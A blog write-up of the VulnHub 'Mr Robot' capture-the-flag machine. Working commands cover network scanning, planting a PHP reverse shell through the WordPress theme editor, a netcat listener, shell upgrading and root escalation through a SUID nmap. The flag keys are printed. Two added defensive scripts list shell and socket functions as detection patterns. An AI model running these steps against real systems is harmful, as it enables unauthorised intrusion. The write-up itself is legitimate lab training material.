Monday, 13 March 2017

VulnHub Write Up - Mr Robot


Vulnerable Machine:


Method:

  • Scanned network to discover target
  • Scanned ports and services on target
  • Scanned the web application for vulnerabilities and information
  • Scanned for specific WordPress vulnerabilities
  • Exploit WordPress by uploading a php-reverse-shell
  • Use a misconfigured SUID Bit to escalate privileges

Tools:



Useful links:




Write up:

The first step in any penetration test, whether it is network or web based, is intelligence gathering. After we had our attacking machine and our Mr Robot virtual machine both on the host-only network adapter, our first step was to scan the network for our target.
I ran an nmap scan with the -n flag to skip DNS resolution, as we are on a host-only network (the box is not connected to the internet; it is generally bad practice to have a vulnerable machine internet-facing, for obvious reasons), with the -sn flag for host discovery, and used the * wildcard to scan all IPs from 192.168.56.0-255:

root@Hazana:~# nmap -n -sn 192.168.56.*
Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-12 15:30 GMT
Nmap scan report for 192.168.56.103
Host is up (0.00013s latency).
MAC Address: 08:00:27:A2:13:1F (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up (0.00016s latency).
MAC Address: 08:00:27:CF:FB:C2 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.103
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 6.98 seconds

As my machine is .103, and I know .100 is the host-only ethernet adapter, we have our target: .102.
Next was to scan the target for ports and services.
The -A flag probes for open ports and service versions and performs OS fingerprinting:

root@Hazana:~# nmap -A -n 192.168.56.102
Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-12 15:31 GMT
Nmap scan report for 192.168.56.102
Host is up (0.00030s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open   ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
MAC Address: 08:00:27:CF:FB:C2 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.2
Network Distance: 1 hop
TRACEROUTE
HOP RTT     ADDRESS
1   0.29 ms 192.168.56.102

(Unfortunately the actual webpages were having problems displaying for me, but from checking the source code and from what I've read there is some fun stuff to explore.)

We can see it is running a web server. I like to use a tool called Nikto to scan for vulnerabilities and misconfigurations:



root@Hazana:~# nikto -h 192.168.56.102
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.102
+ Target Hostname:    192.168.56.102
+ Target Port:        80
+ Start Time:         2017-03-12 15:44:31 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3092: /readme: This might be interesting...
+ Uncommon header 'link' found, with contents: <http://192.168.56.102/?p=23>; rel=shortlink
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found
+ /blog/wp-login.php: Wordpress login found
+ /wp-login.php: Wordpress login found
+ 7535 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time:           2017-03-12 15:47:08 (GMT0) (157 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

We can gather some useful things from the Nikto scan:

- The server is leaking ETags, related to CVE-2003-1418, meaning the server is leaking sensitive information in the form of inode numbers and PIDs
- We can brute force the server for file names because mod_negotiation is enabled with MultiViews
- Found /admin and /admin/index.html (an admin login page; we will remember this if we find any credentials) and two /wp-login.php pages, also useful if we find any credentials
- We also know the server is running WordPress, which often contains vulnerabilities

I decided to run WPScan, a WordPress security scanner. It reported a lot of XSS issues, but those weren't going to be useful for us:

root@Hazana:~/MrRobot# wpscan --url 192.168.56.102
[+] URL: http://192.168.56.102/
[+] Started: Sun Mar 12 16:18:09 2017
[+] robots.txt available under: 'http://192.168.56.102/robots.txt'
[+] Interesting header: SERVER: Apache
[+] Interesting header: X-FRAME-OPTIONS: SAMEORIGIN
[+] Interesting header: X-MOD-PAGESPEED: 1.9.32.3-4523
[+] XML-RPC Interface available under: http://192.168.56.102/xmlrpc.php

However, from this scan we can see that /robots.txt exists. /robots.txt is essentially a way of telling web crawlers not to crawl certain pages, so they won't show up in Google search results, for example.

After browsing to /robots.txt we can see the disallowed entries:
User-agent: *
fsocity.dic
key-1-of-3.txt
After browsing to 192.168.56.102/key-1-of-3.txt we get our first key!

Key 1:
073403c8a58a1f80d943455fb30724b9

I then decided to check /fsocity.dic, which gave us a download:



I opened it up with gedit and it seems to be a word list:




Using wc -l on the file in the terminal we can count the number of lines:
root@Hazana:~/MrRobot# wc -l fsocity.dic
858160 fsocity.dic
So, a big wordlist!
I decided to go back and check what Nikto had found. I browsed to /admin/index.html and checked the source code:




/readme.html:






/wp-links-opml.php revealed the WordPress version, this may come in useful later:




/license.txt shows us:
"what do you just pull code from Rapid9 or some s@#% since when you become a script kitty?"
Which, if I recall, is a quote from Elliot in the show:





I almost missed it, but if you scroll down on the /license.txt page you can see what looks like a base64 encoded string right at the bottom.
So, I decoded it in my browser using the HackBar extension (check it out, I highly recommend it):





It decoded to elliot:ER28-0652. These look like credentials, so we shall go back and try them at /wp-admin/, which we made note of earlier:




Success!





Looking around, I noticed that under Appearance > Editor we can directly edit the theme's PHP code! Let's try and get a PHP reverse shell!
Pentestmonkey has already written a great PHP reverse shell here,
or you can easily download it in a terminal with:

git clone https://github.com/pentestmonkey/php-reverse-shell

Now we can edit the script to put in our IP address:




Then copy and paste it into the WP editor:




Next we need to set up a netcat listener to catch the connection; 1234 is the port number we defined in the script:

root@Hazana:~ # nc -nvlp 1234
listening on [any] 1234 ...

Then browse to the URL of the PHP file we edited, which will make the web server execute our script:
http://192.168.56.102/wp-content/themes/twentyfifteen/404.php

Bingo! A reverse shell!

root@Hazana:~ #
connect to [192.168.56.103] from (UNKNOWN) [192.168.56.102] 35697
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
16:56:26 up  1:35,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
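As a defensive counterpart to the theme-editor step above (an added example, not part of the write-up or of the pentestmonkey project), this POSIX shell script keeps a sha256 manifest of a theme directory and reports any PHP file that has changed since, grepping each changed file for the socket and process functions a reverse shell needs. WP_THEMES, BASELINE and the sample theme used in testing are assumptions.

```shell
#!/bin/sh
# Added example (not from the write-up): catch a theme file rewritten through the
# WordPress Appearance > Editor, as 404.php was above. ASSUMED paths: WP_THEMES is
# the themes directory, BASELINE a sha256 manifest taken while the site was clean.
WP_THEMES="${WP_THEMES:-/var/www/html/wp-content/themes}"
BASELINE="${BASELINE:-/var/lib/wp-baseline/themes.sha256}"

# Functions the pentestmonkey shell and most PHP web shells rely on; a theme
# template has no legitimate reason to call them.
SUSPECT_FUNCS='fsockopen|proc_open|shell_exec|passthru|popen|exec\('

# make_baseline DIR FILE: write a sorted sha256 manifest of every PHP file under DIR.
make_baseline() {
    ( cd "$1" && find . -type f -name '*.php' -exec sha256sum {} + | LC_ALL=C sort ) > "$2"
}

# changed_files DIR BASELINE: print PHP files whose current hash is absent from the
# manifest, i.e. modified since the baseline or newly dropped into the tree.
changed_files() {
    current=$(mktemp)
    make_baseline "$1" "$current"
    LC_ALL=C comm -13 "$2" "$current" | awk '{ print $2 }'
    rm -f "$current"
}

# scan_suspect FILE: print numbered lines that call shell or socket functions.
scan_suspect() {
    grep -En "$SUSPECT_FUNCS" "$1"
}

# audit_theme DIR BASELINE: list changed files with any web-shell indicators in
# them; returns 1 when something changed so a cron job can alert on exit status.
audit_theme() {
    list=$(changed_files "$1" "$2")
    [ -n "$list" ] || return 0
    printf '%s\n' "$list" | while IFS= read -r f; do
        printf 'CHANGED: %s\n' "$f"
        scan_suspect "$1/$f" | sed 's/^/  suspect line /'
    done
    return 1
}

# Hardening that removes the whole vector: define('DISALLOW_FILE_EDIT', true);
# in wp-config.php disables the in-browser theme and plugin editor.
if [ "${1:-}" = "--audit" ]; then
    audit_theme "$WP_THEMES" "$BASELINE"
fi
```

Take the baseline with make_baseline right after a clean install or upgrade, and retake it after every legitimate theme change.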

Now we can navigate in our PHP reverse shell:

$
$ cd home
$ ls
robot
$ cd robot
$ ls
key-2-of-3.txt
password.raw-md5
$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

Now we have an MD5 hash! We could crack it ourselves, but that might take a while, so let's submit it to CrackStation to see if they already have the hash in their database.



Great! We now have a password and a username!

robot: abcdefghijklmnopqrstuvwxyz

Now we need to be able to log in with these credentials. However, our PHP shell just won't cut it, so we can upgrade our shell using a simple trick with Python. Some extra reading on the difference between terminals, shells, TTYs and consoles can be found here.

$ python -c 'import pty; pty.spawn("/bin/sh")'
$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz
(su can be thought of as "switch user", so we can execute commands with the privileges of the robot user)

Now we are logged in as robot!

robot@linux:~$ ls
ls
key-2-of-3.txt    password.raw-md5
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959


2nd key:
822c73956184f694993bede3eb39f959

Now let's enumerate the internals of this host. I always check to see if nmap is installed:

robot@linux:~$ nmap --help
nmap --help
Nmap 3.81 Usage: nmap [Scan Type(s)] [Options] <host or net list>

So we have nmap installed, although it is a much older version. Anyhow, let's scan ourselves using nmap -A localhost:

Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2017-03-12 17:14 UTC
Interesting ports on localhost (127.0.0.1):
(The 1659 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsFTPd 3.0.2
80/tcp   open  http    Apache httpd
443/tcp  open  ssl     Nessus security scanner
3306/tcp open  mysql

So we have FTP and MySQL running, interesting!
The problem is that we have no credentials to access them. We could brute force them hoping for weak credentials, but I decided to have a further look around first to see if there were any clues:

robot@linux:/$ cd root
cd root
bash: cd: root: Permission denied

Hmm, perhaps some privilege escalation is in order.
There's a reason it is constantly drilled into us to keep our software up to date; I decided to check if there were any problems with that old version of nmap.
I came across this article.
Essentially, we can find all files that are owned by root and have the SUID permission bit set (-perm -4000), and throw any errors away to /dev/null:

robot@linux:/$ find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown

We can see nmap is in there! It shouldn't have these permissions, so let's try and abuse them.
As this is an older nmap, we can start interactive mode with --interactive:

robot@linux:/$ nmap --interactive
nmap> !sh
!sh
(The !sh lets us escape to a shell with the privileges nmap is running with; the # prompt below shows that this is root)

# cd root
cd root
# ls
ls
firstboot_done key-3-of-3.txt
# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4


Just like that we can abuse the permission in our nmap shell and read the final key!

Key 3:
04787ddef27c3dee1ee161b21670b4e4
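On the defending side, the same find command doubles as an audit. The POSIX shell script below is an added example (not from the write-up) that compares every set-uid root file against an expected list and fails when something like /usr/local/bin/nmap shows up; the BASELINE list is an assumption modelled on the stock entries in the listing above and should be captured from your own known-good build.

```shell
#!/bin/sh
# Added example (not from the write-up): flag set-uid root binaries that are not
# on an expected list. The list below is an ASSUMPTION modelled on the stock
# entries in the find output above; capture your own from a known-good build.
BASELINE="
/bin/ping /bin/ping6 /bin/mount /bin/umount /bin/su
/usr/bin/passwd /usr/bin/newgrp /usr/bin/chsh /usr/bin/chfn /usr/bin/gpasswd
/usr/bin/sudo /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
"

# list_suid_root [ROOT]: the same find the write-up used, restricted to regular
# files on local filesystems; errors (unreadable dirs) go to /dev/null.
list_suid_root() {
    find "${1:-/}" -xdev -type f -user root -perm -4000 -print 2>/dev/null
}

# in_baseline PATH: succeed if PATH is one of the expected binaries.
in_baseline() {
    for expected in $BASELINE; do
        [ "$1" = "$expected" ] && return 0
    done
    return 1
}

# audit_suid: read paths (one per line) on stdin, print every one that is not in
# the baseline, and return 1 if any were found. /usr/local/bin/nmap from the
# listing above would be reported here.
audit_suid() {
    unexpected=0
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        if ! in_baseline "$path"; then
            unexpected=1
            printf 'UNEXPECTED set-uid root file: %s\n' "$path"
        fi
    done
    return $unexpected
}

# Remediation for a hit is to drop the bit (chmod u-s PATH) or remove the
# package; run the audit from cron and alert on a non-zero exit status.
if [ "${1:-}" = "--audit" ]; then
    list_suid_root / | audit_suid
fi
```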


Hope you enjoyed my first write up, any questions or improvements let me know, thanks!
